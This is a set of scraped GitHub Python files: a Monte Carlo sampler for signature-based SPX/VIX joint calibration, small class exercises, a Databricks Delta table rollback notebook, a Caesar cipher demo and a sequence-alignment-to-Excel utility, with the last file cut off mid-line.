p_components[dict_words_numbers[tuple(shuffled)]]=p_components[dict_words_numbers[tuple(shuffled)]]+1\n p.append(p_components)\n p=np.array(p)\n p=p.reshape((int(np.sqrt(p.shape[0])),int(np.sqrt(p.shape[0])),nbr_param_x2plus))\n return torch.tensor(p)\n\ndef p_shuffle_addtime(order_signatrue,d):\n '''\n Inputs: \n order_signature, d: int, int\n \n Returns:\n p, torch.tensor dimension d_n x d_n x d_2n \n \n '''\n \n nbr_param=number_of_parameters_gen(order_signature*2,d+1)\n dict_words_numbers=dict(zip(get_words(d,order_signature*2),[k for k in range(nbr_param)]))\n p=[]\n wordz=get_words_list(d,order_signature)\n for word1 in tqdm(wordz):\n for word2 in wordz:\n sh=shuffle(word1,word2)\n p_components=np.zeros(nbr_param)\n for shuffled in sh:\n p_components[dict_words_numbers[tuple(shuffled)]]=p_components[dict_words_numbers[tuple(shuffled)]]+1\n p.append(p_components)\n p=np.array(p)\n p=p.reshape((int(np.sqrt(p.shape[0])),int(np.sqrt(p.shape[0])),nbr_param))\n return torch.tensor(p)\n\n\n\n\n\ndef apply_along_axis(function, x, axis):\n torch_unbind=torch.unbind(x, dim=axis)\n aux=Parallel(n_jobs=-1)(delayed(function)(x_i) for x_i in tqdm(torch_unbind))\n return aux #torch.stack(aux,dim=axis)\n\ndef integration_torch(function,x,axis):\n return torch.trapz(torch.stack(apply_along_axis(function, x, axis),dim=axis),x)\n\nif numerical_approx==True:\n \n G=OUL(d-1,2*order_signature,X0[:d-1],thetas[:d-1],kappas[:d-1],sigmas[:d-1],Rho[:d-1,:d-1]) #removing the BM component\n G_torch=torch.tensor(G)\nnbr_param=number_of_parameters_gen(order_signature*2,d-1+1)\n#print('Check if the dimension of G is correct:',G.shape == (nbr_param,nbr_param))\ndict_words_numbers=dict(zip(get_words(d-1,order_signature*2),[k for k in range(nbr_param)]))\nDelta=1/12\n\nif numerical_approx==True:\n if np.max(np.abs(np.linalg.eig((G_torch*Delta).numpy())[0]))<1:\n print('Spectral radius:', np.max(np.abs(np.linalg.eig((G_torch*Delta).numpy())[0])))\n print('Spectral radius < 1, we can use Taylor expansion')\n len_expansion=100 #Computes the integral by expanding to len_expansion the definition of e^Gt\n taylor_exp=torch.eye(G_torch.shape[0])*Delta\n factorials=[np.math.factorial(k+1) for k in range(1,len_expansion)]\n for k in tqdm(range(1,len_expansion),desc='Taylor expansion'):\n k_th_term_taylor=Delta*torch.linalg.matrix_power(G_torch*Delta,k)*(factorials[k-1]**(-1))\n taylor_exp=taylor_exp+k_th_term_taylor\n else:\n nbins=50 #this can be pushed if nbr_parameters is not too high\n print('Spectral radius > 1, we can use Trapezoidal rule with N=',nbins)\n f2 = lambda t: torch.matrix_exp(t*G_torch)\n tv = np.linspace(0,Delta,nbins)\n torch_tv=torch.tensor(tv)\n for r in tqdm(range(1),desc='Trapezoidal rule'):\n exponential=integration_torch(f2,torch_tv,-1)\n\n\ndef sparse_dense_mul_vec(s, d):\n i = s._indices()\n v = s._values()\n dv = d[i[0,:]] # get values from relevant entries of dense matrix\n res=torch.matmul(v,dv)\n return res\n\ndef get_shuffled_integral_matrix(taylor_exp,order_signature,d):\n nbr_param=number_of_parameters_gen(order_signature*2,d+1)\n dict_words_numbers=dict(zip(get_words(d,order_signature*2),[k for k in range(nbr_param)]))\n wordz=get_words_list(d,order_signature)\n shuffled_integral_matrix=np.zeros((len(wordz),len(wordz),nbr_param))\n \n for i,word1 in enumerate(wordz):\n for j,word2 in enumerate(wordz):\n sh=shuffle(word1,word2)\n p_components=np.zeros(nbr_param)\n for shuffled in sh:\n p_components[dict_words_numbers[tuple(shuffled)]]=p_components[dict_words_numbers[tuple(shuffled)]]+1\n shuffled_integral_matrix[i,j,:]=sparse_dense_mul_vec(torch.tensor(p_components).to_sparse(),taylor_exp)\n return torch.tensor(shuffled_integral_matrix)\n\n# This commented part is to check convergence of the the trapezoidal towards the Taylor and viceversa\n# =============================================================================\n# sh1=get_shuffled_integral_matrix(taylor_exp,order_signature,d-1)\n# sh2=get_shuffled_integral_matrix(exponential,order_signature,d-1)\n# \n# error_matrix=(torch.matmul(G_torch,f2(Delta))-G_torch)*(-(Delta**3)/(nbins**2))\n# print('1000 highest Error analysis matrix:', torch.sort(error_matrix.flatten()).values[-1000:])\n# \n# \n# print('Comparison shuffled integral matrix', torch.sort(torch.abs(sh1-sh2).flatten()).values[-1000:])\n# \n# =============================================================================\n\nif numerical_approx==True:\n \n if np.max(np.abs(np.linalg.eig((G_torch*Delta).numpy())[0]))<1:\n shuffled_integral_matrix=get_shuffled_integral_matrix(taylor_exp,order_signature,d-1)\n else:\n shuffled_integral_matrix=get_shuffled_integral_matrix(exponential,order_signature,d-1)\n \n \n print('Shuffled_integral_matrix shape:',shuffled_integral_matrix.shape)\n \n print('Dimension G:', f2(Delta).shape)\n\n\n\n\n\n\n\ndef enumerated_product(*args):\n yield from zip(itt.product(*(range(len(x)) for x in args),repeat=2), itt.product(*args,repeat=2))\n\n\n\n##################### COMPUTATION OF THE Q^(0,CV) FOR THE SPX\n\nif flag_gatheral==True:\n os.chdir(r'/scratch.global/ag_cu/Codes_Guido/Randomness_Gatheral2/n='+str(order_signature)+'/'+config)\nelse:\n os.chdir(r'/scratch.global/ag_cu/Codes_Guido/Randomness/n='+str(order_signature)+'/'+config)\n\n\nif available_Gplus==True:\n dim=len(get_words(d-1,order_signature*2+1))\n G_torch_plus=torch.tensor(np.load('G_plus(('+str(dim)+', '+str(dim)+')).npy'))\n print('Loaded G shape:',G_torch_plus.shape)\nelse:\n G_plus=OUL(d-1,2*order_signature+1,X0,thetas,kappas,sigmas,Rho) \n G_torch_plus=torch.tensor(G_plus)\n shape_G_plus=G_torch_plus.shape\n np.save(f'G_plus({shape_G_plus}).npy',G_torch_plus.numpy())\n\nf3 = lambda t: torch.matrix_exp(t*G_torch_plus)\n\nwordz=get_words_list(d-1,order_signature)\ndict_words_numbers=dict(zip(get_words(d-1,order_signature*2+1),[k for k in range(len(get_words(d-1,order_signature*2+1)))]))\nnbr_param_x2plus=len(get_words(d-1,order_signature*2+1))\n\n\n######## VIX\n\n\n\ndef get_shuffled_integral_matrix_withtime(matrix,order_signature,d):\n nbr_param=number_of_parameters_gen(order_signature*2+1,d+1)\n dict_words_numbers=dict(zip(get_words(d,order_signature*2+1),[k for k in range(nbr_param)]))\n wordz=get_words_list(d,order_signature)\n print(wordz)\n shuffled_integral_matrix=np.zeros((len(wordz),len(wordz),nbr_param))\n print(nbr_param)\n for i,word1 in enumerate(wordz):\n for j,word2 in enumerate(wordz):\n sh=shuffle_and_add_time(word1,word2)\n p_components=np.zeros(nbr_param)\n for shuffled in sh:\n p_components[dict_words_numbers[tuple(shuffled)]]=p_components[dict_words_numbers[tuple(shuffled)]]+1\n shuffled_integral_matrix[i,j,:]=sparse_dense_mul_vec(torch.tensor(p_components).to_sparse(),matrix)\n return torch.tensor(shuffled_integral_matrix)\n\n\nprint('list joint maturities:',list_joint_maturities)\n\nsig_trivial=torch.zeros([nbr_param_x2plus]).type(torch.DoubleTensor)\nsig_trivial[0]=1\n\nif flag_save_control_variates==True:\n exps=[f3(mat+Delta)-f3(mat) for mat in tqdm(list_of_maturities_vix, desc='exp vix')]\n exps2=[f3(mat) for mat in tqdm(list_joint_maturities, desc='exp joint')]\nelse:\n print('No CV')\n \nmatrix_exp_id=f3(Delta)-torch.eye(nbr_param_x2plus)\n\n\nprint('Checkpoint before CV sampling')\n\nif numerical_approx==False:\n if flag_save_control_variates==True:\n Q_cv=torch.stack([torch.matmul(get_shuffled_integral_matrix_withtime(matrix,order_signature,d-1),sig_trivial) for matrix in tqdm(exps,desc='Q_cv')])\n Q0_cv=torch.stack([torch.matmul(get_shuffled_integral_matrix_withtime(matrix,order_signature,d-1),sig_trivial) for matrix in tqdm(exps2,desc='Q_cv0')])\n print('Shape Q0:cv', Q0_cv.shape)\n print('Shape Q:cv', Q_cv.shape)\n \n shape_Q0_cv=Q0_cv.shape\n shape_Q_cv=Q_cv.shape\n \n np.save(f'CV_exact_SPX({shape_Q0_cv}).npy',Q0_cv.numpy())\n np.save(f'CV_exact_VIX({shape_Q_cv}).npy',Q_cv.numpy())\n \n\n shuffled_integral_matrix=get_shuffled_integral_matrix_withtime(matrix_exp_id,order_signature,d-1)\n else:\n shuffled_integral_matrix=get_shuffled_integral_matrix_withtime(matrix_exp_id,order_signature,d-1)\n \n\n\n\n\nprint('Checkpoint after CV sampling')\n\n\n# dimension Q0_cv : (nbr_maturities_joint, nbr_parameters_to_calibrate, nbr_parameters_to_calibrate)\n# type Q0_cv: torch.tensor\n# dimension Q_cv : (nbr_maturities_vix, nbr_parameters_to_calibrate, nbr_parameters_to_calibrate)\n# type Q0_cv: torch.tensor\n\n\nif flag_gatheral==True:\n os.chdir(r'/scratch.global/ag_cu/Codes_Guido/Randomness_Gatheral2/n='+str(order_signature)+'/'+config)\nelse:\n os.chdir(r'/scratch.global/ag_cu/Codes_Guido/Randomness/n='+str(order_signature)+'/'+config)\n\n\n\ndef chol_n_transpose(q):\n '''\n Inputs:\n q: np.array, positive semidefinite symmetric matrix\n Returns:\n U: np.array, upper triangular matrix of Cholesky decomposition\n '''\n return np.linalg.cholesky(q).transpose()\n\ndef filter_positive_semidef(Q,idx_mat):\n nbr_params=Q.shape[-1]\n Q=Q[idx_mat,:,:,:].numpy()\n check_eigenvalues=np.sum(np.linalg.eigvalsh(Q)>0,axis=1)\n bad_indices=np.where(check_eigenvalues0)\n Returns: list of Cholesky decompositions\n '''\n \n Q=filter_positive_semidef(Q,idx_mat)\n adjusted_mc_number=Q.shape[0] \n list_=np.array(Parallel(n_jobs=-1)(delayed(chol_n_transpose)(Q[j,:,:]) for j in tqdm(range(adjusted_mc_number),desc='Chol')))\n return list_\n\n\nprint('List of joint maturities:',list_joint_maturities)\n\n\nwordz=get_words_list(d-1,order_signature)\ndict_words_numbers=dict(zip(get_words(d-1,order_signature*2+1),[k for k in range(len(get_words(d-1,order_signature*2+1)))]))\n\n\ndef sample_tilde_df_andQ0_multimaturities(N,maturities,mat_spx,mat_vix,X0,sigmas,kappas,thetas,Rho,order_signature,flag_mat,indices,new_tilde,keys_df,keys_df_vix,Cov,d,idx_Z_d,shuffled_integral_matrix,dict_words_numbers,wordz):\n \n \n idx_vix=np.nonzero(mat_vix[:, None] == maturities)[1]\n \n \n # Raw sig\n sig=sample_sig_OU_multi_minimal_all_mat(N,maturities,X0,sigmas,kappas,thetas,Rho,2*order_signature+1,flag_mat)\n sig_df_spx=pd.DataFrame(data=sig,index=indices , columns=keys_df)\n sig_df_vix=pd.DataFrame(data=sig[idx_vix],index=indices[:len(mat_vix)], columns=keys_df)\n \n \n # For spx\n transformed_sig_df=transform_df_multivariate(sig_df_spx,new_tilde,order_signature,d,Cov)\n transformed_sig_df, not_dropped=remove_redundant_components(transformed_sig_df,idx_Z_d,d,True)\n transformed_sig_df= torch.tensor(np.array(transformed_sig_df))\n \n keys_df_vix2=[str(word).replace(',','') if len(word)==1 else str(word).replace(' ','') for word in get_words(d-1,order_signature*2+1)]\n sig_df_spx=sig_df_spx.loc[:,keys_df_vix2]\n\n \n nbr_param_x2plus=sig_df_spx.shape[1] \n Q0_all=np.zeros((len(maturities),len(not_dropped),len(not_dropped)))\n sig_df_spx=torch.tensor(np.transpose(np.array(sig_df_spx)))\n \n \n for idx,word1 in enumerated_product(wordz):\n sh=shuffle_and_add_time(word1[0],word1[1])\n p_components=np.zeros(nbr_param_x2plus)\n for shuffled in sh:\n p_components[dict_words_numbers[tuple(shuffled)]]=p_components[dict_words_numbers[tuple(shuffled)]]+1\n Q0_all[:,idx[0],idx[1]]=torch.matmul(torch.tensor(p_components),sig_df_spx)\n \n Q0_all=torch.tensor(Q0_all)\n # For vix\n Q=torch.matmul(shuffled_integral_matrix,torch.transpose(torch.tensor(sig_df_vix[keys_df_vix2].values),0,1))\n \n \n return [transformed_sig_df, Q0_all,Q]\n\n\n\n\n\n# CHANGE HERE THE DIRECTORY WHERE YOU WOULD LIKE TO STORE THE RANDOMNESS \n\n\nif flag_gatheral==True:\n os.chdir(r'/scratch.global/ag_cu/Codes_Guido/Randomness_Gatheral2/n='+str(order_signature)+'/'+config)\nelse:\n os.chdir(r'/scratch.global/ag_cu/Codes_Guido/Randomness/n='+str(order_signature)+'/'+config)\n\n\n\n\nrounds=8\nMC_nbr=10000\nprint('Checkpoint before sampling')\n\nif flag_missing_last==True:\n for u in tqdm(range(1),desc='Slice samples'):\n \n \n random_components = Parallel(n_jobs=-1)(delayed(sample_tilde_df_andQ0_multimaturities)(N,list_joint_maturities,list_of_maturities_spx,list_of_maturities_vix,X0,sigmas,kappas,thetas,Rho,order_signature,flag_mat,indices,new_tilde,keys_df,keys_df_vix,Cov,d,idx_Z_d,shuffled_integral_matrix,dict_words_numbers,wordz) for j in tqdm(range(MC_nbr)))\n random_components = [item for sublist in random_components for item in sublist]\n \n\n E_sig_B=torch.transpose(torch.stack(random_components[0::3]),0,1)\n Q0=torch.transpose(torch.stack(random_components[1::3]),0,1)\n Q=torch.transpose(torch.transpose(torch.stack(random_components[2::3]),0,3),1,3)\n\n \n if flag_chol_vix==True:\n L=np.array([cholesky_dec(Q,k) for k in tqdm(range(Q.shape[0]),desc='By Maturity')])\n L_torch=torch.tensor(L)\n np.save(f'L({order_signature},{d},7).npy',L)\n else:\n np.save(f'Q({order_signature},{d},7).npy',Q.numpy())\n \n \n np.save(f'E_sig_B({order_signature},{d},7).npy',E_sig_B.numpy())\n np.save(f'Q_0({order_signature},{d},7).npy',Q0.numpy())\n \n \nelse:\n \n print('Total number of Monte Carlo Samples will be :',int(MC_nbr*rounds))\n \n for u in tqdm(range(rounds),desc='Slice samples'):\n \n \n random_components = Parallel(n_jobs=-1)(delayed(sample_tilde_df_andQ0_multimaturities)(N,list_joint_maturities,list_of_maturities_spx,list_of_maturities_vix,X0,sigmas,kappas,thetas,Rho,order_signature,flag_mat,indices,new_tilde,keys_df,keys_df_vix,Cov,d,idx_Z_d,shuffled_integral_matrix,dict_words_numbers,wordz) for j in tqdm(range(MC_nbr)))\n random_components = [item for sublist in random_components for item in sublist]\n \n \n E_sig_B=torch.transpose(torch.stack(random_components[0::3]),0,1)\n Q0=torch.transpose(torch.stack(random_components[1::3]),0,1)\n Q=torch.transpose(torch.transpose(torch.stack(random_components[2::3]),0,3),1,3)\n \n \n \n if flag_chol_vix==True:\n L=np.array([cholesky_dec(Q,k) for k in tqdm(range(Q.shape[0]),desc='By Maturity')])\n L_torch=torch.tensor(L)\n np.save(f'L({order_signature},{d},{u}).npy',L)\n else:\n np.save(f'Q({order_signature},{d},{u}).npy',Q.numpy())\n \n \n \n \n np.save(f'E_sig_B({order_signature},{d},{u}).npy',E_sig_B.numpy())\n np.save(f'Q_0({order_signature},{d},{u}).npy',Q0.numpy())\n \n np.save('Rho_d='+str(d)+'.npy',Rho)\n \n \n \n","repo_name":"GuidoGazzani-ai/jointcalib_sigsde","sub_path":"sampler/Joint_Calibration_Sampler.py","file_name":"Joint_Calibration_Sampler.py","file_ext":"py","file_size_in_byte":33532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71213497768","text":"class Person:\n def __init__(self, age, name):\n self.age = age\n self.name = name\n self.__friends = []\n\n def know(self, other):\n self.__friends.append(other)\n\n def is_known(self, other):\n return other in self.__friends\n\n\nperson1 = Person(18, 'Oleg')\nperson2 = Person(24, 'Dima')\nperson3 = Person(25, 'Vitalik')\nperson1.know(person2)\nprint(person1.is_known(person2))\nprint(person1.is_known(person3))\n\n\n","repo_name":"AnnHalii/Python_Hillel","sub_path":"lk_11_hw/2_task.py","file_name":"2_task.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24882092401","text":"from person import Person,Staff,Fellow\nfrom room import Room,Office,LivingSpace\n\nclass Dojo(Room,Person):\n def __init__(self):\n self.rooms = []\n self.persons = []\n def create_room(self,room_name,room_type):\n if room_type.upper() == \"OFFICE\":\n room = Office(str(room_name.upper()))\n self.rooms.append(room_name)\n print(\"An {} called {} has been created successfully\".format(room_type,room_name))\n if room_type.upper() == \"LIVINGSPACE\":\n room = LivingSpace(str(room_name.upper()))\n self.rooms.append(room_name)\n print(\"A {} called {} has been created successfully\".format(room_type,room_name))\n \n def add_person(self,name,role):\n if role.upper() == \"FELLOW\":\n person = Fellow(name)\n self.persons.append(name)\n print(\"Fellow {} has been successfully added\".format(name))\n \n if role.upper() == \"STAFF\":\n person = Staff(name)\n self.persons.append(name)\n print(\"Staff {} has been successfully added \".format(name)) \n\nroom1 = Dojo()\nroom1.create_room('Newyork','Office') \nroom1.add_person('Sankara','fellow')\nprint(room1.persons)\nroom2 = Dojo()\nroom2.create_room('Mexico','LivingSpace') ","repo_name":"Roland-Sankara/SpaceAllocation","sub_path":"Space_Allocation/dojo.py","file_name":"dojo.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14254088053","text":"# Databricks notebook source\n# MAGIC %run ./utils\n\n# COMMAND ----------\n\ndbutils.widgets.text(name='Version', defaultValue='0')\ndbutils.widgets.dropdown('Table', 'None', table_names() + ['None'])\n#dbutils.widgets.removeAll()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC #### Reset table\n\n# COMMAND ----------\n\nversion = int(dbutils.widgets.get('Version'))\ntable = str(dbutils.widgets.get('Table'))\ndatabase, table_name = table.split('.')[0], table.split('.')[1] \nold_version = ks.read_delta(path='dbfs:/user/hive/warehouse/{}.db/{}/'.format(database, table_name),\n version=version)\nold_version.to_table(name=table,\n format='delta',\n mode='overwrite')","repo_name":"MoAdel1/FinancialDataIngestion","sub_path":"jobs/rollback.py","file_name":"rollback.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25653697425","text":"def ceaser_cipher_encrypt(text, key):\n encrypted_text = \"\"\n for i in text:\n if i == \" \":\n encrypted_text += i\n elif i.isupper():\n encrypted_text += chr((((ord(i) + key) - 65 )% 26) + 65)\n else:\n encrypted_text += chr((((ord(i) + key) - 97 )% 26) + 97)\n\n return encrypted_text\n\n\ndef ceaser_cipher_decrypt(text, key):\n decrypted_text = \"\"\n for i in text:\n if i == \" \":\n decrypted_text += i\n elif i.isupper():\n decrypted_text += chr((((ord(i) - key) - 65 )% 26) + 65)\n else:\n decrypted_text += chr((((ord(i) - key) - 97 )% 26) + 97)\n\n return decrypted_text\n\n\ntext = input(\"Enter the Text to Encrypt!\\n\")\nkey = int(input(\"Enter the Key for Encryption!\\n\"))\n\nprint(\"Encrypted Text: {}\".format(ceaser_cipher_encrypt(text=text, key=int(key))))\n\nprint(\"Decrypted Text: {}\".format(ceaser_cipher_decrypt(\n text=ceaser_cipher_encrypt(text=text, key=int(key)), key=int(key))\n )\n )\n\n","repo_name":"HarshitDawar55/CryptoGraphy","sub_path":"Ceaser-Cipher/python/ceaser.py","file_name":"ceaser.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70021025128","text":"from os import listdir\nfrom os.path import isfile, join\nimport pandas as pd\nimport openpyxl\nfrom time import clock\nimport random\nimport math\nimport Bio as bio\nfrom Bio import SeqIO\nimport glob\n\nimport Logic\n\nclass Utils:\n def __init__(self):\n self.ext_txt = \".txt\"\n self.ext_dat = \".dat\"\n self.ext_xlsx = \".xlsx\"\n\n \"\"\"\n get file lists in target dir by target ext\n :param\n path : target dir + \"*.\" + target ext\n :return\n ['target dir/file_name.target ext', 'target dir/file_name.target ext' ...]\n \"\"\"\n def get_files_from_dir(self, path):\n return glob.glob(path)\n\n \"\"\"\n :return\n {'D:/000_WORK/YuGooSang_KimHuiKwon/20200609/WORK_DIR/first_excel_output\\\\result_gDNA_0609.txt': \n [\n ['1', 'Group1,2_RT/20-PBS/7-#Target723'\n , 'AATATATCTTGTGGAAAGGACGAAACACCG--CATACTCGGGCGC-------CGGGGTGTTTTAGAGCTAGAAATAGCAAGTTAAAATAAGGCTAGACCGTTATCAACTTGAAAAAGTGGCACCGAGTCGGTGCACATGCCAGGTGGACGAGTTTTCTTGCTTTTTTTGATACTCTGTCTGTACTACAACGCCCATTTCCGCAAGAAAACTGGTCTACCTGGCATGTTCAGCTTGGCGTACCGCGATCTCTACTCTACCACTTGTACTTCAGCGGTCAGCTTACTCGACTTAA'\n , '.||||||||||||||||||||||||||||| ||| .|| ||| | ||||||||||||||||||||||||||||||||||||||.||||||||||||||||||||||||||||||||||||||||||||||||.|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||'\n , 'TATATATCTTGTGGAAAGGACGAAACACCGCCCAT-TTC---CGCAAGAAAAC-----GTTTTAGAGCTAGAAATAGCAAGTTAAAATAAGGCTAGTCCGTTATCAACTTGAAAAAGTGGCACCGAGTCGGTGCACATGCCAGGTAGACgAGTTTTCTTGCTTTTTTTGATACTCTGTCTGTACTACAACGCCCATTTCCGCAAGAAAACTGGTCTACCTGGCATGTTCAGCTTGGCGTAcCgcGATCTCTACTCTACCACTTGTACTTCAGCGGTCAGCTTACTCGACTTAA', '293', '293', '293', 'O']\n , ['2', 'Group1,2_RT/12-PBS/11-#Target1948'\n , 'TATATATCTTGTGGAAAGGACGAAACACCGAAGTCCGTCAGATTCTATCGTTTTAGAGCTAGAAATAGCAAGTTAAAATAAGGCTAGTCCGTTATCAACTTGAAAAAGTGGCACCGAGTCGGTGCATACCACGAGATAGAATCTGACGTTTTTTTCGTACTCATATATACATATCTCTAAGTCCGTCAGATTCTATCTGGTGGTATCTCCAGGTGAAGCTTGGCGTACCGCGATCTCTACTCTACCACTTGTACTTCAGCGGTCAGCTTACTCGACTTAA'\n , '||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||'\n , 'TATATATCTTGTGGAAAGGACGAAACACCGAAGTCCGTCAGATTCTATCGTTTTAGAGCTAGAAATAGCAAGTTAAAATAAGGCTAGTCCGTTATCAACTTGAAAAAGTGGCACCGAGTCGGTGCATACCACgAGATAGAATCTGACGTTTTTTTCGTACTCATATATACATATCTCTAAGTCCGTCAGATTCTATCTGGTGGTATCTCCAGGTGAAGCTTGGCGTAcCgcGATCTCTACTCTACCACTTGTACTTCAGCGGTCAGCTTACTCGACTTAA', '280', '280', '280', 'O']\n , ['3', 'Group1,2_RT/20-PBS/17-#Target833'\n , '-----------------------------------------------------------------------------------------CG-------CTTGAAAAAGTGGCACCGAGTCGGTGCTTACCTCTTTGGATCGTGATCACAATCCTCCAGATGCTTTTTTTCAGATAGCATACTGTATACTGGGCATCTGGAGGATTGTGATCAGGATCCAAAGAGGTAATGAGCTTGGCGTACCGCGATCTCTACTCTACCACTTGTACTTCAGCGGTCAGCTTACTCGACTTAACGTGCACGTGACACGTTCCAGACCGTACATGCTTACATGGGATGAAGCTTGGCGTAACTAGATCTTGAGACAAATGGCAGTATT'\n , ' || |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| '\n , 'TATATATCTTGTGGAAAGGACGAAACACCGCATCTGGAGGATTGTGATCGTTTTAGAGCTAGAAATAGCAAGTTAAAATAAGGCTAGTCCGTTATCAACTTGAAAAAGTGGCACCGAGTCGGTGCTTACCTCTTTGGATCgTGATCACAATCCTCCAGATGCTTTTTTTCAGATAGCATACTGTATACTGGGCATCTGGAGGATTGTGATCAGGATCCAAAGAGGTAATGAGCTTGGCGTAcCgcGATCTCTACTCTACCACTTGTACTTCAGCGGTCAGCTTACTCGACTTAA------------------------------------------------------------------------------------', '378', '378', '378', 'O']\n , ['4', 'Group1,2_RT/12-PBS/9-#Target489'\n , 'TATATATCTTGTGGAAAGGACGAAACACCGGCGCGGAACAGGTCG--ATC-TGTTTTAGAGCTAGAAATAGCAAGTTAAAATAAGGCTAGTCCGTTATCAACTTGAAAAAGTGGCACCGAGTCGGTGCAAGTACCGTTTGATGCCGCTGTTTTTTTCATACACGACACACATCTGAGGTCGTTCACCAGCGGCATCAAAGGGTACTTCATGGCGCATAGCTTGGTGTACCGCGATCTCTACTCTACCACTTGTACTTCAGCGGTCAGCTTACTCGACTTAA'\n , '||||||||||||||||||||||||||||| |||...|.||| || ||| .||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||.||||||||||||||||||||||||||||||||||||||||||||||||||||||||'\n , 'TATATATCTTGTGGAAAGGACGAAACACC-GCGTTCACCAG--CGGCATCAAGTTTTAGAGCTAGAAATAGCAAGTTAAAATAAGGCTAGTCCGTTATCAACTTGAAAAAGTGGCACCGAGTCGGTGCAAGTACCgTTTGATGCCGCTGTTTTTTTCATACACGACACACATCTGAGGTCGTTCACCAGCGGCATCAAAGGGTACTTCATGGCGCATAGCTTGGCGTAcCgcGATCTCTACTCTACCACTTGTACTTCAGCGGTCAGCTTACTCGACTTAA', '281', '281', '281', 'O']\n ...]}\n \"\"\"\n def get_result_dict_by_fnm(self, sources):\n result_dict = {}\n for i in range(len(sources)):\n tmp_list = []\n with open(sources[i], \"r\") as f:\n print(sources[i])\n print(f.readline())\n while True:\n tmp_line = f.readline().replace(\"\\n\", \"\")\n if tmp_line == \"\":\n break\n tmp_list.append(tmp_line.split(\"\\t\"))\n\n result_dict[sources[i]] = tmp_list\n\n return result_dict\n\n \"\"\"\n :param\n result_dict = { 'file_name as key' : \n [['Final index', sub_dict, ins_dict, del_dict, last index of ref_seq], ...]\n , 'D:/000_WORK/YuGooSang_KimHuiKwon/20200609/WORK_DIR/first_excel_output\\\\result_gDNA_0609.txt': \n [['Group1,2_RT/20-PBS/7-#Target723'\n , {1: 'T->A', 36: 'T->C', 88: 'T->A', 137: 'A->G'}\n , {35: 'A', 38: 'GGG', 49: 'GGGGT'}\n , {31: 'C', 32: 'C', 42: 'A', 43: 'A', 44: 'G', 45: 'A', 46: 'A', 47: 'A', 48: 'A'}, 284]\n , ['Group1,2_RT/12-PBS/11-#Target1948', {}, {}, {}, 280]\n , ['Group1,2_RT/20-PBS/17-#Target833'\n , {}\n , {294: 'CGTGCACGTGACACGTTCCAGACCGTACATGCTTACATGGGATGAAGCTTGGCGTAACTAGATCTTGAGACAAATGGCAGTATT'}\n , {1: 'T', 2: 'A', 3: 'T', 4: 'A', 5: 'T', 6: 'A', 7: 'T', 8: 'C', 9: 'T', 10: 'T', 11: 'G', 12: 'T', 13: 'G', 14: 'G', 15: 'A', 16: 'A', 17: 'A', 18: 'G', 19: 'G', 20: 'A', 21: 'C', 22: 'G', 23: 'A', 24: 'A', 25: 'A', 26: 'C', 27: 'A', 28: 'C', 29: 'C', 30: 'G', 31: 'C', 32: 'A', 33: 'T', 34: 'C', 35: 'T', 36: 'G', 37: 'G', 38: 'A', 39: 'G', 40: 'G', 41: 'A', 42: 'T', 43: 'T', 44: 'G', 45: 'T', 46: 'G', 47: 'A', 48: 'T', 49: 'C', 50: 'G', 51: 'T', 52: 'T', 53: 'T', 54: 'T', 55: 'A', 56: 'G', 57: 'A', 58: 'G', 59: 'C', 60: 'T', 61: 'A', 62: 'G', 63: 'A', 64: 'A', 65: 'A', 66: 'T', 67: 'A', 68: 'G', 69: 'C', 70: 'A', 71: 'A', 72: 'G', 73: 'T', 74: 'T', 75: 'A', 76: 'A', 77: 'A', 78: 'A', 79: 'T', 80: 'A', 81: 'A', 82: 'G', 83: 'G', 84: 'C', 85: 'T', 86: 'A', 87: 'G', 88: 'T', 89: 'C', 92: 'T', 93: 'T', 94: 'A', 95: 'T', 96: 'C', 97: 'A', 98: 'A'}\n , 294]\n , ['Group1,2_RT/12-PBS/9-#Target489'\n , {33: 'T->C', 34: 'T->G', 35: 'C->G', 37: 'C->A', 49: 'A->T', 222: 'C->T'}\n , {29: 'G', 40: 'GT'}\n , {43: 'G', 44: 'C', 48: 'A'}\n , 278]\n ]\n }\n \"\"\"\n def make_excel(self, path, result_dict):\n logic = Logic.Logics()\n\n for fn_key, val_list in result_dict.items():\n workbook = openpyxl.Workbook()\n sheet = workbook.active\n\n row = 1\n sheet.cell(row=row, column=1, value=\"index\")\n sheet.cell(row=row, column=2, value='Final index')\n sheet.cell(row=row, column=3, value='Type')\n sheet.cell(row=row, column=4, value='Start')\n sheet.cell(row=row, column=5, value='End')\n sheet.cell(row=row, column=6, value='Sequence')\n\n for val_arr in val_list:\n final_index = val_arr[0].replace('\"', '')\n sub_dict = val_arr[1]\n ins_dict = val_arr[2]\n del_dict = val_arr[3]\n last_idx = val_arr[4]\n end_idx = 0\n for i in range(last_idx):\n if i > end_idx:\n if i in sub_dict:\n row += 1\n sheet.cell(row=row, column=1, value=str(row - 1))\n sheet.cell(row=row, column=2, value=final_index)\n sheet.cell(row=row, column=3, value='Sub')\n sheet.cell(row=row, column=4, value=str(i))\n end_idx, sub_seq_from, sub_seq_to = logic.get_sub_idx_seq(i + 1, sub_dict, sub_dict[i].split(\"->\"))\n sheet.cell(row=row, column=5, value=str(end_idx))\n sheet.cell(row=row, column=6, value=sub_seq_from + \"->\" + 